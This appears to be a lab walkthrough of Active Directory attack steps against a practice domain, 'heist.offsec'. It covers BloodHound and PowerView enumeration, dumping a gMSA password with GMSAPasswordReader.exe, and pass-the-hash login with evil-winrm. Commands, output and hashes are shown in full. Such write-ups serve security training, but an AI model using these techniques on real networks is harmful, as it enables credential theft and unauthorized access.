Enumerating Objects

Example

In this page we'll cover some enumeration TTP's that we can use to further understand the active directory objects in the domain we're working with.

Reviewing Bloodhound

Once we load data into bloodhound we can get a map of the users on the domain we want to target, this often gives us valuable information on intersting objects we want to enumerate further

This shows that the svc_apache service account can read the GMSA password, which means that the svc_apache account is a Group Managed Service Account (gMSA).

NOTE: Group managed service accounts (gMSAs) are managed domain accounts that you use to help secure services. Password management for that account is handled by the Windows operating system.

Confirm GMSA is enabled

We can confirm that the user svc_apache service account has GMSA enabled.

PS C:\Users\enox> Get-ADServiceAccount -Filter * | where-object {$_.ObjectClass -eq "msDS-GroupManagedServiceAccount"}


DistinguishedName : CN=svc_apache,CN=Managed Service Accounts,DC=heist,DC=offsec
Enabled           : True
Name              : svc_apache
ObjectClass       : msDS-GroupManagedServiceAccount
ObjectGUID        : d40bc264-0c4e-4b86-b3b9-b775995ba303
SamAccountName    : svc_apache$
SID               : S-1-5-21-537427935-490066102-1511301751-1105
UserPrincipalName :

The following command provides info about which groups have permissions to retrieve the password for the svc_apache service account:

Get-ADServiceAccount -Filter {name -eq 'svc_apache'} -Properties * | Select CN,DNSHostName,DistinguishedName,MemberOf,Created,LastLogonDate,PasswordLastSet,msDS-ManagedPasswordInterval,PrincipalsAllowedToDelegateToAccount,PrincipalsAllowedToRetrieveManagedPassword,ServicePrincipalNames


CN                                         : svc_apache
DNSHostName                                : DC01.heist.offsec
DistinguishedName                          : CN=svc_apache,CN=Managed Service Accounts,DC=heist,DC=offsec
MemberOf                                   : {CN=Remote Management Users,CN=Builtin,DC=heist,DC=offsec}
Created                                    : 7/20/2021 4:23:44 AM
LastLogonDate                              : 9/14/2021 8:27:06 AM
PasswordLastSet                            : 7/20/2021 4:23:44 AM
msDS-ManagedPasswordInterval               : 30
PrincipalsAllowedToDelegateToAccount       : {}
PrincipalsAllowedToRetrieveManagedPassword : {CN=DC01,OU=Domain Controllers,DC=heist,DC=offsec, CN=Web Admins,CN=Users,DC=heist,DC=offsec}
ServicePrincipalNames                      :



We see under PrincipalsAllowedToRetrieveManagedPassword we see the group "Web Admins" let's enumerate this group further.

Review Domain Group "Web Admins" PowerView

Let's find the domain members in "Web Admins" with PowerView

PS> Get-DomainGroupMember "Web Admins"



GroupDomain             : heist.offsec
GroupName               : Web Admins
GroupDistinguishedName  : CN=Web Admins,CN=Users,DC=heist,DC=offsec
MemberDomain            : heist.offsec
MemberName              : enox
MemberDistinguishedName : CN=Naqi,CN=Users,DC=heist,DC=offsec
MemberObjectClass       : user
MemberSID               : S-1-5-21-537427935-490066102-1511301751-1103


We can see that our current user: "enox" can extract passwords! This means once we extract we can login to apache_svc.

Extracting the gMSA Password Using GMSAPasswordReader.exe

We can use GMSAPasswordReader.exe to retrieve the gMSA password with our current user.

.\GMSAPasswordReader.exe --accountname 'svc_apache'

Calculating hashes for Old Value
[*] Input username             : svc_apache$
[*] Input domain               : HEIST.OFFSEC
[*] Salt                       : HEIST.OFFSECsvc_apache$
[*]       rc4_hmac             : 526C435B8E4CF11F447D6EF7152665BB
[*]       aes128_cts_hmac_sha1 : 19565C12FDE19AD1033BA3BBD56DD230
[*]       aes256_cts_hmac_sha1 : 43F6DECE6269A588687ACFF41F633A0F7AA9C3FBC7FEAB8BE6981854C19FE817
[*]       des_cbc_md5          : 4AEA91DCEF918F29

Calculating hashes for Current Value
[*] Input username             : svc_apache$
[*] Input domain               : HEIST.OFFSEC
[*] Salt                       : HEIST.OFFSECsvc_apache$
[*]       rc4_hmac             : 83AC7FECFBF44780E3AAF5D04DD368A5
[*]       aes128_cts_hmac_sha1 : 08E643C43F775FAC782EDBB04DD40541
[*]       aes256_cts_hmac_sha1 : 588C2BB865E771ECAADCB48ECCF4BCBCD421BF329B0133A213C83086F1A2E3D7
[*]       des_cbc_md5          : 9E340723700454E9

NOTE: rc4_hmac is the same as the nt hash.

Login to svc_apache with credentials

DONT FORGET THE $ IN THE USERNAME! ANYTIME YOU SEE THIS YOU MUST ADD IT!

evil-winrm -i 192.168.191.165 -u svc_apache$ -H 83AC7FECFBF44780E3AAF5D04DD368A5 

Last updated